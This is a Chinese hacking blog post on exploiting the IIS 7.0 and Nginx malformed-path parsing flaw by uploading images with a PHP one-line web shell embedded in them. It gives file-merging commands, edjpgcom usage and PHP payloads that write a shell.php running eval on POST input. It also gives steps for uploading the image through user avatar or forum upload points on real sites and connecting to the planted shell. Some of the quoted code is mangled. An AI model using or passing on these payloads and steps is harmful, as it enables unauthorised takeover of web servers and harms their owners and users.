IIS7.0 Bug 渗透详解

 

老文章但是依旧很精彩。 刚才在群里看见了有人转发Noseay之前利用iis7.0渗透周杰伦官网

 

貌似多少个n年前我在黑阔手册中见过这个文章。那会是iis7.0的漏洞刚爆出没多久事

 

因为那会的bug很多，iis6.0 被kevin1986 刚发布没多久紧接着iis7.0的漏洞就出来了

 

就好比回忆起了2006年那时候到处都是注入点的菊花等着你去插插插!!!

 

那是2009年普瑞斯特大神到处插菊花不是拿下KFC就是XxX教育局那时起一直关注他

 

不过渐渐的他隐退了。当时就在他博客里发现了edjpgcom合并一句话，拿下iis7.0的bug 

 

记得当时我还转载过这个文章，今天难得看见了，就想说写有关edjpgcom和iis7.0的合并一句话：

 

通杀IIS7.0畸形解析0day漏洞：

 

先合并一张PHP一句话图片马，合并方法：

 

①、DOS合并：copy 1.gif /b + 1.txt/a asp.gif

 

②、用edjpgcom，进行图片和一句话木马的合并

 

图片随便找一张.

 

顺带着说一下edjpgcom的使用方法：

 

打开edjpgcom.exe所在文件夹，然后把你所要修改的图片拖动到edjpgcom.exe上面

 

然后edjpgcom.exe会自动打开，写入想要些的代码即可

 

一句话:

 

 

<!--?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?-->’);?>

 

然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马

 

找到图片地址,然后在地址后面加个shell.php，在浏览器中运行

 

比如假设图片地址为http://www.iick.blog/fuck/1.jpg

 

则执行地址为http://www.iick.blog/fuck/1.jpg/shell.php

 

然后,会在目录下生成shell.php

 

比如:http://www.iick.blog/shell.php

 

shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好

 

上面就是Nginx拿站全过程，IIS7.0的畸形解析和这个类似

 

找到某个使用IIS7.0架设的站，然后找到其中的图片上传点（不需要管理权限，普通注册用户即可搞定）

 

把PHP大马后缀改成.jpg，传上去，得到图片地址

 

在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好

 

 

<!--?fputs(fopen(“fuck.php”,”w”),” <?eval(\\$_POST[fuck]);?-->”)?>

 

做好一句话图片木马后往头像上传，访问头像地址，在后面随便加个/xx.php

 

剩下的你们懂得！